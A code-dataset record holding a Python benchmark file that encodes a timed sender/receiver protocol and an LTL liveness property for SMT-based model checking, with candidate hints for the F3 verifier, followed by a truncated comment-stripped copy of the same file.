hexsha
stringlengths 40
40
| size
int64 4
996k
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
996k
| avg_line_length
float64 1.33
58.2k
| max_line_length
int64 2
323k
| alphanum_fraction
float64 0
0.97
| content_no_comment
stringlengths 0
946k
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
790da02a1f4ea3a9e0f830edc861126ed46cf2b6
| 18,657
|
py
|
Python
|
benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_10.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_10.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_10.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import FrozenSet
from collections import Iterable
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
assert not name.startswith("_"), name
s = msat_declare_function(menv, name, c_type)
s = msat_make_constant(menv, s)
x_s = msat_declare_function(menv, name_next(name), c_type)
x_s = msat_make_constant(menv, x_s)
return s, x_s
def make_enum(menv, v_name: str, enum_size: int):
bool_type = msat_get_bool_type(menv)
num_bits = ceil(log(enum_size, 2))
b_vars = []
for idx in range(num_bits):
c_name = "{}{}".format(v_name, idx)
b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
vals = []
x_vals = []
for enum_val in range(enum_size):
bit_val = format(enum_val, '0{}b'.format(num_bits))
assert len(bit_val) == num_bits
assert all(c in {'0', '1'} for c in bit_val)
assign = [b_vars[idx] if c == '1' else
(msat_make_not(menv, b_vars[idx][0]),
msat_make_not(menv, b_vars[idx][1]))
for idx, c in enumerate(reversed(bit_val))]
pred = assign[0][0]
x_pred = assign[0][1]
for it in assign[1:]:
pred = msat_make_and(menv, pred, it[0])
x_pred = msat_make_and(menv, x_pred, it[1])
vals.append(pred)
x_vals.append(x_pred)
assert len(vals) == enum_size
assert len(x_vals) == enum_size
return b_vars, vals, x_vals
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
m_one = msat_make_number(menv, "-1")
arg1 = msat_make_times(menv, arg1, m_one)
return msat_make_plus(menv, arg0, arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def diverging_symbs(menv: msat_env) -> frozenset:
real_type = msat_get_rational_type(menv)
delta = msat_declare_function(menv, delta_name, real_type)
delta = msat_make_constant(menv, delta)
return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
msat_term, msat_term):
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
r2s, x_r2s = decl_consts(menv, "r2s", int_type)
s2r, x_s2r = decl_consts(menv, "s2r", int_type)
delta, x_delta = decl_consts(menv, delta_name, real_type)
sender = Sender("s", menv, enc, r2s, x_r2s, s2r, x_s2r, delta)
receiver = Receiver("r", menv, enc, s2r, x_s2r, r2s, x_r2s, delta)
curr2next = {r2s: x_r2s, s2r: x_s2r, delta: x_delta}
for comp in [sender, receiver]:
for s, x_s in comp.symb2next.items():
curr2next[s] = x_s
zero = msat_make_number(menv, "0")
init = msat_make_and(menv, receiver.init, sender.init)
trans = msat_make_and(menv, receiver.trans, sender.trans)
# invar delta >= 0
init = msat_make_and(menv, init,
msat_make_geq(menv, delta, zero))
trans = msat_make_and(menv, trans,
msat_make_geq(menv, x_delta, zero))
# delta > 0 -> (r2s' = r2s & s2r' = s2r)
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_equal(menv, x_r2s, r2s),
msat_make_equal(menv, x_s2r, s2r))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, lhs, rhs))
# (G F !s.stutter) -> G (s.wait_ack -> F s.send)
lhs = enc.make_G(enc.make_F(msat_make_not(menv, sender.stutter)))
rhs = enc.make_G(msat_make_impl(menv, sender.wait_ack,
enc.make_F(sender.send)))
ltl = msat_make_impl(menv, lhs, rhs)
return TermMap(curr2next), init, trans, ltl
class Module:
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
*args, **kwargs):
self.name = name
self.menv = menv
self.enc = enc
self.symb2next = {}
true = msat_make_true(menv)
self.init = true
self.trans = true
def _symb(self, v_name, v_type):
v_name = "{}_{}".format(self.name, v_name)
return decl_consts(self.menv, v_name, v_type)
def _enum(self, v_name: str, enum_size: int):
c_name = "{}_{}".format(self.name, v_name)
return make_enum(self.menv, c_name, enum_size)
class Sender(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
loc, x_loc = self._symb("l", bool_type)
evt, x_evt = self._symb("evt", bool_type)
msg_id, x_msg_id = self._symb("msg_id", int_type)
timeout, x_timeout = self._symb("timeout", real_type)
c, x_c = self._symb("c", real_type)
self.move = evt
self.stutter = msat_make_not(menv, evt)
self.x_move = x_evt
self.x_stutter = msat_make_not(menv, x_evt)
self.send = loc
self.wait_ack = msat_make_not(menv, loc)
self.x_send = x_loc
self.x_wait_ack = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc, evt: x_evt, msg_id: x_msg_id,
timeout: x_timeout, c: x_c}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
base_timeout = one
# send & c = 0 & msg_id = 0
self.init = msat_make_and(menv,
msat_make_and(menv, self.send,
msat_make_equal(menv, c,
zero)),
msat_make_equal(menv, msg_id, zero))
# invar: wait_ack -> c <= timeout
self.init = msat_make_and(
menv, self.init,
msat_make_impl(menv, self.wait_ack,
msat_make_leq(menv, c, timeout)))
self.trans = msat_make_impl(menv, self.x_wait_ack,
msat_make_leq(menv, x_c, x_timeout))
# delta > 0 | stutter -> l' = l & msg_id' = msg_id & timeout' = timeout &
# c' = c + delta & out_c' = out_c
lhs = msat_make_or(menv, msat_make_gt(menv, delta, zero), self.stutter)
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_msg_id, msg_id)),
msat_make_and(menv,
msat_make_equal(menv, x_timeout, timeout),
msat_make_equal(menv, x_c,
msat_make_plus(menv, c, delta))))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
disc_t = msat_make_and(menv, self.move,
msat_make_equal(menv, delta, zero))
# (send & send') ->
# (msg_id' = msg_id & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_send))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id, msg_id),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (send & wait_ack') ->
# (msg_id' = msg_id + 1 & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_wait_ack))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id,
msat_make_plus(menv, msg_id, one)),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack) -> (c' = 0 & out_c' = out_c &
# (wait_ack' <-> (in_c != msg_id & c > timeout))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs_iff = msat_make_and(menv,
msat_make_not(menv,
msat_make_equal(menv, in_c,
msg_id)),
msat_make_geq(menv, c, timeout))
rhs_iff = msat_make_iff(menv, self.x_wait_ack, rhs_iff)
rhs = msat_make_and(menv,
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c,
out_c)),
rhs_iff)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & wait_ack') -> (timeout' > timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack,
self.x_wait_ack))
rhs = msat_make_gt(menv, x_timeout, timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack) -> (send' <-> (in_c = msg_id & c < timeout))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs = msat_make_iff(menv, self.x_send,
msat_make_and(menv,
msat_make_equal(menv, in_c, msg_id),
msat_make_lt(menv, c, timeout)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & send') -> (timeout' = base_timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack, self.x_send))
rhs = msat_make_equal(menv, x_timeout, base_timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
class Receiver(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
loc, x_loc = self._symb("l", bool_type)
self.wait = loc
self.work = msat_make_not(menv, loc)
self.x_wait = x_loc
self.x_work = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc}
zero = msat_make_number(menv, "0")
# wait
self.init = self.wait
# delta > 0 -> loc' = loc & out_c' = out_c
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_impl(menv, lhs, rhs)
disc_t = msat_make_equal(menv, delta, zero)
# wait -> (wait' <-> in_c = out_c)
lhs = msat_make_and(menv, disc_t, self.wait)
rhs = msat_make_iff(menv, self.x_wait,
msat_make_equal(menv, in_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait & wait') -> (out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_wait))
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait & work') -> out_c' = in_c
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_work))
rhs = msat_make_equal(menv, x_out_c, in_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# work -> out_c' = out_c
lhs = msat_make_and(menv, disc_t, self.work)
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
delta = mgr.Symbol(delta_name, types.REAL)
r2s = mgr.Symbol("r2s", types.INT)
s2r = mgr.Symbol("r2s", types.INT)
s_l = mgr.Symbol("s_l", types.BOOL)
s_evt = mgr.Symbol("s_evt", types.BOOL)
s_msg_id = mgr.Symbol("s_msg_id", types.INT)
s_timeout = mgr.Symbol("s_timeout", types.REAL)
s_c = mgr.Symbol("s_c", types.REAL)
r_l = mgr.Symbol("r_l", types.BOOL)
symbs = frozenset([delta, r2s, s2r, s_l, s_evt, s_msg_id, s_timeout, s_c,
r_l])
x_delta = symb_to_next(mgr, delta)
x_r2s = symb_to_next(mgr, r2s)
x_s2r = symb_to_next(mgr, s2r)
x_s_l = symb_to_next(mgr, s_l)
x_s_evt = symb_to_next(mgr, s_evt)
x_s_msg_id = symb_to_next(mgr, s_msg_id)
x_s_timeout = symb_to_next(mgr, s_timeout)
x_s_c = symb_to_next(mgr, s_c)
x_r_l = symb_to_next(mgr, r_l)
res = []
r0 = mgr.Real(0)
r1 = mgr.Real(1)
i0 = mgr.Int(0)
i1 = mgr.Int(1)
loc0 = Location(env, mgr.Equals(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, r0))
hint = Hint("h_delta0", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i0))
hint = Hint("h_s2r0", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(0, x_s_evt)
hint = Hint("h_s_evt0", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, i0))
hint = Hint("h_s_msg_id0", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_c, r0))
loc0.set_progress(0, mgr.Equals(x_s_c, r0))
hint = Hint("h_s_c0", env, frozenset([s_c]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(0, x_r_l)
hint = Hint("h_r_l0", env, frozenset([r_l]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i1))
hint = Hint("h_s2r1", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(r2s, i0))
loc0.set_progress(0, mgr.Equals(x_r2s, i1))
hint = Hint("h_r2s1", env, frozenset([r2s]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_l)
loc0.set_progress(1, mgr.Not(x_s_l))
loc1 = Location(env, mgr.Not(s_l))
loc1.set_progress(0, x_s_l)
hint = Hint("h_s_l1", env, frozenset([s_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(1, mgr.Not(x_s_evt))
loc1 = Location(env, mgr.Not(s_evt))
loc1.set_progress(0, x_s_evt)
hint = Hint("h_s_evt1", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, mgr.Plus(s_msg_id, i1)))
hint = Hint("h_s_msg_id1", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s_timeout, r0))
loc0.set_progress(0, mgr.Equals(x_s_timeout, mgr.Plus(s_timeout, r1)))
hint = Hint("h_s_timeout1", env, frozenset([s_timeout]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(1, mgr.Not(x_r_l))
loc1 = Location(env, mgr.Not(r_l))
loc1.set_progress(0, x_r_l)
hint = Hint("h_r_l1", env, frozenset([r_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, mgr.Plus(delta, r1)))
hint = Hint("h_delta2", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, mgr.Plus(s2r, i1)))
hint = Hint("h_s2r2", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
return frozenset(res)
| 38.388889
| 89
| 0.577049
|
from typing import FrozenSet
from collections import Iterable
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
assert not name.startswith("_"), name
s = msat_declare_function(menv, name, c_type)
s = msat_make_constant(menv, s)
x_s = msat_declare_function(menv, name_next(name), c_type)
x_s = msat_make_constant(menv, x_s)
return s, x_s
def make_enum(menv, v_name: str, enum_size: int):
bool_type = msat_get_bool_type(menv)
num_bits = ceil(log(enum_size, 2))
b_vars = []
for idx in range(num_bits):
c_name = "{}{}".format(v_name, idx)
b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
vals = []
x_vals = []
for enum_val in range(enum_size):
bit_val = format(enum_val, '0{}b'.format(num_bits))
assert len(bit_val) == num_bits
assert all(c in {'0', '1'} for c in bit_val)
assign = [b_vars[idx] if c == '1' else
(msat_make_not(menv, b_vars[idx][0]),
msat_make_not(menv, b_vars[idx][1]))
for idx, c in enumerate(reversed(bit_val))]
pred = assign[0][0]
x_pred = assign[0][1]
for it in assign[1:]:
pred = msat_make_and(menv, pred, it[0])
x_pred = msat_make_and(menv, x_pred, it[1])
vals.append(pred)
x_vals.append(x_pred)
assert len(vals) == enum_size
assert len(x_vals) == enum_size
return b_vars, vals, x_vals
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
m_one = msat_make_number(menv, "-1")
arg1 = msat_make_times(menv, arg1, m_one)
return msat_make_plus(menv, arg0, arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def diverging_symbs(menv: msat_env) -> frozenset:
real_type = msat_get_rational_type(menv)
delta = msat_declare_function(menv, delta_name, real_type)
delta = msat_make_constant(menv, delta)
return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
msat_term, msat_term):
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
r2s, x_r2s = decl_consts(menv, "r2s", int_type)
s2r, x_s2r = decl_consts(menv, "s2r", int_type)
delta, x_delta = decl_consts(menv, delta_name, real_type)
sender = Sender("s", menv, enc, r2s, x_r2s, s2r, x_s2r, delta)
receiver = Receiver("r", menv, enc, s2r, x_s2r, r2s, x_r2s, delta)
curr2next = {r2s: x_r2s, s2r: x_s2r, delta: x_delta}
for comp in [sender, receiver]:
for s, x_s in comp.symb2next.items():
curr2next[s] = x_s
zero = msat_make_number(menv, "0")
init = msat_make_and(menv, receiver.init, sender.init)
trans = msat_make_and(menv, receiver.trans, sender.trans)
init = msat_make_and(menv, init,
msat_make_geq(menv, delta, zero))
trans = msat_make_and(menv, trans,
msat_make_geq(menv, x_delta, zero))
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_equal(menv, x_r2s, r2s),
msat_make_equal(menv, x_s2r, s2r))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, lhs, rhs))
lhs = enc.make_G(enc.make_F(msat_make_not(menv, sender.stutter)))
rhs = enc.make_G(msat_make_impl(menv, sender.wait_ack,
enc.make_F(sender.send)))
ltl = msat_make_impl(menv, lhs, rhs)
return TermMap(curr2next), init, trans, ltl
class Module:
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
*args, **kwargs):
self.name = name
self.menv = menv
self.enc = enc
self.symb2next = {}
true = msat_make_true(menv)
self.init = true
self.trans = true
def _symb(self, v_name, v_type):
v_name = "{}_{}".format(self.name, v_name)
return decl_consts(self.menv, v_name, v_type)
def _enum(self, v_name: str, enum_size: int):
c_name = "{}_{}".format(self.name, v_name)
return make_enum(self.menv, c_name, enum_size)
class Sender(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
loc, x_loc = self._symb("l", bool_type)
evt, x_evt = self._symb("evt", bool_type)
msg_id, x_msg_id = self._symb("msg_id", int_type)
timeout, x_timeout = self._symb("timeout", real_type)
c, x_c = self._symb("c", real_type)
self.move = evt
self.stutter = msat_make_not(menv, evt)
self.x_move = x_evt
self.x_stutter = msat_make_not(menv, x_evt)
self.send = loc
self.wait_ack = msat_make_not(menv, loc)
self.x_send = x_loc
self.x_wait_ack = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc, evt: x_evt, msg_id: x_msg_id,
timeout: x_timeout, c: x_c}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
base_timeout = one
self.init = msat_make_and(menv,
msat_make_and(menv, self.send,
msat_make_equal(menv, c,
zero)),
msat_make_equal(menv, msg_id, zero))
self.init = msat_make_and(
menv, self.init,
msat_make_impl(menv, self.wait_ack,
msat_make_leq(menv, c, timeout)))
self.trans = msat_make_impl(menv, self.x_wait_ack,
msat_make_leq(menv, x_c, x_timeout))
# c' = c + delta & out_c' = out_c
lhs = msat_make_or(menv, msat_make_gt(menv, delta, zero), self.stutter)
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_msg_id, msg_id)),
msat_make_and(menv,
msat_make_equal(menv, x_timeout, timeout),
msat_make_equal(menv, x_c,
msat_make_plus(menv, c, delta))))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
disc_t = msat_make_and(menv, self.move,
msat_make_equal(menv, delta, zero))
# (send & send') ->
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_send))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id, msg_id),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (msg_id' = msg_id + 1 & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_wait_ack))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id,
msat_make_plus(menv, msg_id, one)),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack) -> (c' = 0 & out_c' = out_c &
# (wait_ack' <-> (in_c != msg_id & c > timeout))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs_iff = msat_make_and(menv,
msat_make_not(menv,
msat_make_equal(menv, in_c,
msg_id)),
msat_make_geq(menv, c, timeout))
rhs_iff = msat_make_iff(menv, self.x_wait_ack, rhs_iff)
rhs = msat_make_and(menv,
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c,
out_c)),
rhs_iff)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack,
self.x_wait_ack))
rhs = msat_make_gt(menv, x_timeout, timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs = msat_make_iff(menv, self.x_send,
msat_make_and(menv,
msat_make_equal(menv, in_c, msg_id),
msat_make_lt(menv, c, timeout)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & send') -> (timeout' = base_timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack, self.x_send))
rhs = msat_make_equal(menv, x_timeout, base_timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
class Receiver(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
loc, x_loc = self._symb("l", bool_type)
self.wait = loc
self.work = msat_make_not(menv, loc)
self.x_wait = x_loc
self.x_work = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc}
zero = msat_make_number(menv, "0")
# wait
self.init = self.wait
# delta > 0 -> loc' = loc & out_c' = out_c
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_impl(menv, lhs, rhs)
disc_t = msat_make_equal(menv, delta, zero)
# wait -> (wait' <-> in_c = out_c)
lhs = msat_make_and(menv, disc_t, self.wait)
rhs = msat_make_iff(menv, self.x_wait,
msat_make_equal(menv, in_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_wait))
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_work))
rhs = msat_make_equal(menv, x_out_c, in_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
lhs = msat_make_and(menv, disc_t, self.work)
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
delta = mgr.Symbol(delta_name, types.REAL)
r2s = mgr.Symbol("r2s", types.INT)
s2r = mgr.Symbol("r2s", types.INT)
s_l = mgr.Symbol("s_l", types.BOOL)
s_evt = mgr.Symbol("s_evt", types.BOOL)
s_msg_id = mgr.Symbol("s_msg_id", types.INT)
s_timeout = mgr.Symbol("s_timeout", types.REAL)
s_c = mgr.Symbol("s_c", types.REAL)
r_l = mgr.Symbol("r_l", types.BOOL)
symbs = frozenset([delta, r2s, s2r, s_l, s_evt, s_msg_id, s_timeout, s_c,
r_l])
x_delta = symb_to_next(mgr, delta)
x_r2s = symb_to_next(mgr, r2s)
x_s2r = symb_to_next(mgr, s2r)
x_s_l = symb_to_next(mgr, s_l)
x_s_evt = symb_to_next(mgr, s_evt)
